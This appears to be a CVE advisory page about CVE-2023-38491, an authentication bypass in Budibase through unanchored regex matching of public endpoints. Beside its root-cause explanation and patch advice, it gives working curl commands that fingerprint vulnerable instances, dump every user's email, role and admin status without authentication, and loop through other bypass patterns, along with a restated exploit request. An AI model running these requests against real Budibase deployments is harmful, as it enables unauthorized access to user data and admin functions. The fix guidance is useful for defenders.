Listen to this Post
How CVE-2023-38491 works:
The authenticated middleware in Budibase uses unanchored regular expressions to match public (no‑auth) endpoint patterns against ctx.request.url. Because Koa’s `ctx.request.url` includes the entire URL with query string, an attacker can append a public endpoint path as a query parameter to any protected endpoint. The regex, compiled without `^` or `$` anchors (line 26 in matchers.ts), matches anywhere in the string. When `regex.test(ctx.request.url)` runs (line 32), a malicious query like `?x=/api/system/status` causes the regex to match inside the query string. This sets `publicEndpoint = true` (lines 123‑125 in authenticated.ts). In the worker’s global auth check (index.ts lines 160‑162), `ctx.publicEndpoint` skips the 403 verification entirely. Endpoints grouped under `loggedInRoutes` (e.g., `standard.ts` line 23) have no per‑route auth middleware, so they become fully exposed. Affected endpoints include POST /api/global/users/search, GET /api/global/self, GET /api/global/users/accountholder, GET /api/global/template/definitions, POST /api/global/license/refresh, and POST /api/global/event/publish. The `builderOrAdminRoutes` and `adminRoutes` are not affected because they have secondary middleware that independently checks ctx.user. An attacker can send a request like `POST /api/global/users/search?x=/api/system/status` to retrieve all users (emails, roles, admin status) without any authentication.
dailycve form:
Platform: Budibase
Version: before 2.0.15
Vulnerability: Auth bypass via regex injection
Severity: Critical
date: 2023-07-25
Prediction: 2023-08-10
What Undercode Say:
Identify vulnerable instance
curl -s -o /dev/null -w "%{http_code}" -X POST -H "Content-Type: application/json" -d '{}' "https://target/api/global/users/search?x=/api/system/status"
Expected output: 200 (bypass) vs 403 (normal)
Enumerate all users
curl -s -X POST -H "Content-Type: application/json" -d '{}' "https://target/api/global/users/search?x=/api/system/status" | jq '.data[] | {email, role, admin}'
Test other public endpoint patterns
for pattern in "/api/system/environment" "/api/global/configs/public" "/api/global/auth/default"; do
curl -s -X POST "https://target/api/global/license/refresh?x=$pattern" -d '{}' -H "Content-Type: application/json"
done
Exploit:
Send a POST request to any `loggedInRoutes` endpoint, appending `?x=/api/system/status). The unanchored regex matches the query parameter, marking the request as public and bypassing authentication. Example: `POST /api/global/users/search?x=/api/system/status` returns full user directory.
Protection from this CVE:
Upgrade to Budibase version 2.0.15 or later. If patching is not possible, apply one of the suggested fixes: (A) anchor the regex in `matchers.ts` line 26 to '^' + route + '(\\?|$)', or (B) use `ctx.request.path` instead of `ctx.request.url` at line 32 to exclude the query string. Additionally, implement per‑route authentication middleware for all sensitive endpoints as a defense‑in‑depth measure.
Impact:
Unauthenticated attackers can enumerate all users (emails, names, roles, admin status), identify the account holder, trigger license refreshes (causing potential service disruption), and publish arbitrary events into the event system. The user search endpoint poses the highest risk, exposing the full user directory of any internet‑facing Budibase instance.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

